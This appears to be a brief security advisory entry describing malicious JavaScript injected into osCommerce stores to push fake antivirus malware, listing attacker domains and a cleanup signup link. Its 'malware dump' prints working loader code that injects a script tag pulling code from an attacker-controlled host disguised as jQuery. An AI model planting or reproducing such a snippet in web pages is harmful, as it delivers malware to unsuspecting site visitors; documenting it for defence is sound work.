Description: Malicious Javascript found on osCommerce stores. It is used to distribute malware (fake AV) to anyone visiting the compromised site.
Domains used::
http://roybeth.com/ext/jquery.php
nadobolchetrafa.cx.cc
majorten.345.pl
krytotenuchka.cx.cc
Affecting: Any osCommerce site.
Clean up:Sign up here: http://sucuri.net/signup
Malware dump:
var
i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php";
try { s=document.createElement("script");
s.src=ss;
document.body.appendChild( s );
} catch(erst) { }